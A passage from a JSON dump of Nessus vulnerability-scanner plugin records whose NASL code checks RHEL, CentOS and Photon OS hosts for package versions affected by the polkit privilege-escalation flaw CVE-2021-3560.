(!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-debuginfo / polkit-debugsource / polkit-devel / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-14T12:48:30", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2021:2236 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-09-15T00:00:00", "type": "nessus", "title": "RHEL 8 : polkit (RHSA-2021:2236)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:redhat:rhel_e4s:8.1", "cpe:/o:redhat:rhel_eus:8.1", "p-cpe:/a:redhat:enterprise_linux:polkit", "p-cpe:/a:redhat:enterprise_linux:polkit-devel", "p-cpe:/a:redhat:enterprise_linux:polkit-docs", "p-cpe:/a:redhat:enterprise_linux:polkit-libs"], "id": "REDHAT-RHSA-2021-2236.NASL", "href": "https://www.tenable.com/plugins/nessus/165139", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:2236. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(165139);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"RHSA\", value:\"2021:2236\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"RHEL 8 : polkit (RHSA-2021:2236)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:2236 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3560\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2236\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1961710\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-libs\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.1')) audit(AUDIT_OS_NOT, 'Red Hat 8.1', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/e4s/rhel8/8.1/ppc64le/appstream/debug',\n 'content/e4s/rhel8/8.1/ppc64le/appstream/os',\n 'content/e4s/rhel8/8.1/ppc64le/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.1/ppc64le/baseos/debug',\n 'content/e4s/rhel8/8.1/ppc64le/baseos/os',\n 'content/e4s/rhel8/8.1/ppc64le/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.1/ppc64le/highavailability/debug',\n 'content/e4s/rhel8/8.1/ppc64le/highavailability/os',\n 'content/e4s/rhel8/8.1/ppc64le/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.1/ppc64le/sap-solutions/debug',\n 'content/e4s/rhel8/8.1/ppc64le/sap-solutions/os',\n 'content/e4s/rhel8/8.1/ppc64le/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.1/ppc64le/sap/debug',\n 'content/e4s/rhel8/8.1/ppc64le/sap/os',\n 'content/e4s/rhel8/8.1/ppc64le/sap/source/SRPMS',\n 'content/e4s/rhel8/8.1/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.1/x86_64/appstream/os',\n 'content/e4s/rhel8/8.1/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.1/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.1/x86_64/baseos/os',\n 'content/e4s/rhel8/8.1/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.1/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.1/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.1/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.1/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.1/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.1/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.1/x86_64/sap/debug',\n 'content/e4s/rhel8/8.1/x86_64/sap/os',\n 'content/e4s/rhel8/8.1/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.1/aarch64/appstream/debug',\n 'content/eus/rhel8/8.1/aarch64/appstream/os',\n 'content/eus/rhel8/8.1/aarch64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.1/aarch64/baseos/debug',\n 'content/eus/rhel8/8.1/aarch64/baseos/os',\n 'content/eus/rhel8/8.1/aarch64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.1/aarch64/codeready-builder/debug',\n 'content/eus/rhel8/8.1/aarch64/codeready-builder/os',\n 'content/eus/rhel8/8.1/aarch64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.1/aarch64/highavailability/debug',\n 'content/eus/rhel8/8.1/aarch64/highavailability/os',\n 'content/eus/rhel8/8.1/aarch64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.1/aarch64/supplementary/debug',\n 'content/eus/rhel8/8.1/aarch64/supplementary/os',\n 'content/eus/rhel8/8.1/aarch64/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.1/ppc64le/appstream/debug',\n 'content/eus/rhel8/8.1/ppc64le/appstream/os',\n 'content/eus/rhel8/8.1/ppc64le/appstream/source/SRPMS',\n 'content/eus/rhel8/8.1/ppc64le/baseos/debug',\n 'content/eus/rhel8/8.1/ppc64le/baseos/os',\n 'content/eus/rhel8/8.1/ppc64le/baseos/source/SRPMS',\n 'content/eus/rhel8/8.1/ppc64le/codeready-builder/debug',\n 'content/eus/rhel8/8.1/ppc64le/codeready-builder/os',\n 'content/eus/rhel8/8.1/ppc64le/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.1/ppc64le/highavailability/debug',\n 'content/eus/rhel8/8.1/ppc64le/highavailability/os',\n 'content/eus/rhel8/8.1/ppc64le/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.1/ppc64le/resilientstorage/debug',\n 'content/eus/rhel8/8.1/ppc64le/resilientstorage/os',\n 'content/eus/rhel8/8.1/ppc64le/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.1/ppc64le/sap-solutions/debug',\n 'content/eus/rhel8/8.1/ppc64le/sap-solutions/os',\n 'content/eus/rhel8/8.1/ppc64le/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.1/ppc64le/sap/debug',\n 'content/eus/rhel8/8.1/ppc64le/sap/os',\n 'content/eus/rhel8/8.1/ppc64le/sap/source/SRPMS',\n 'content/eus/rhel8/8.1/ppc64le/supplementary/debug',\n 'content/eus/rhel8/8.1/ppc64le/supplementary/os',\n 'content/eus/rhel8/8.1/ppc64le/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.1/s390x/appstream/debug',\n 'content/eus/rhel8/8.1/s390x/appstream/os',\n 'content/eus/rhel8/8.1/s390x/appstream/source/SRPMS',\n 'content/eus/rhel8/8.1/s390x/baseos/debug',\n 'content/eus/rhel8/8.1/s390x/baseos/os',\n 'content/eus/rhel8/8.1/s390x/baseos/source/SRPMS',\n 'content/eus/rhel8/8.1/s390x/codeready-builder/debug',\n 'content/eus/rhel8/8.1/s390x/codeready-builder/os',\n 'content/eus/rhel8/8.1/s390x/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.1/s390x/highavailability/debug',\n 'content/eus/rhel8/8.1/s390x/highavailability/os',\n 'content/eus/rhel8/8.1/s390x/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.1/s390x/resilientstorage/debug',\n 'content/eus/rhel8/8.1/s390x/resilientstorage/os',\n 'content/eus/rhel8/8.1/s390x/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.1/s390x/sap/debug',\n 'content/eus/rhel8/8.1/s390x/sap/os',\n 'content/eus/rhel8/8.1/s390x/sap/source/SRPMS',\n 'content/eus/rhel8/8.1/s390x/supplementary/debug',\n 'content/eus/rhel8/8.1/s390x/supplementary/os',\n 'content/eus/rhel8/8.1/s390x/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/appstream/debug',\n 'content/eus/rhel8/8.1/x86_64/appstream/os',\n 'content/eus/rhel8/8.1/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/baseos/debug',\n 'content/eus/rhel8/8.1/x86_64/baseos/os',\n 'content/eus/rhel8/8.1/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.1/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.1/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.1/x86_64/highavailability/os',\n 'content/eus/rhel8/8.1/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.1/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.1/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.1/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.1/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/sap/debug',\n 'content/eus/rhel8/8.1/x86_64/sap/os',\n 'content/eus/rhel8/8.1/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.1/x86_64/supplementary/os',\n 'content/eus/rhel8/8.1/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'polkit-0.115-9.el8_1.1', 'sp':'1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-9.el8_1.1', 'sp':'1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-9.el8_1.1', 'sp':'1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-9.el8_1.1', 'sp':'1', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var subscription_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in the Red Hat Enterprise Linux\\n' +\n 'Extended Update Support or Update Services for SAP Solutions repositories.\\n' +\n 'Access to these repositories requires a paid RHEL subscription.\\n';\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = subscription_caveat + rpm_report_get() + redhat_report_repo_caveat();\n else extra = subscription_caveat + rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / polkit-libs');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:53:24", "description": "The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the CESA-2021:2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-09T00:00:00", "type": "nessus", "title": "CentOS 8 : polkit (CESA-2021:2238)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/o:centos:centos:8", "cpe:/o:centos:centos:8-stream", "p-cpe:/a:centos:centos:polkit", "p-cpe:/a:centos:centos:polkit-devel", "p-cpe:/a:centos:centos:polkit-docs", "p-cpe:/a:centos:centos:polkit-libs"], "id": "CENTOS8_RHSA-2021-2238.NASL", "href": "https://www.tenable.com/plugins/nessus/150384", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2021:2238. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150384);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"RHSA\", value:\"2021:2238\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"CentOS 8 : polkit (CESA-2021:2238)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2021:2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2238\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:polkit-libs\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'polkit-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / polkit-libs');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:52:42", "description": "An update of the polkit package has been released.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Polkit PHSA-2021-1.0-0397", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:polkit", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2021-1_0-0397_POLKIT.NASL", "href": "https://www.tenable.com/plugins/nessus/150284", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-1.0-0397. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150284);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Photon OS 1.0: Polkit PHSA-2021-1.0-0397\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the polkit package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-397.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 1.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) 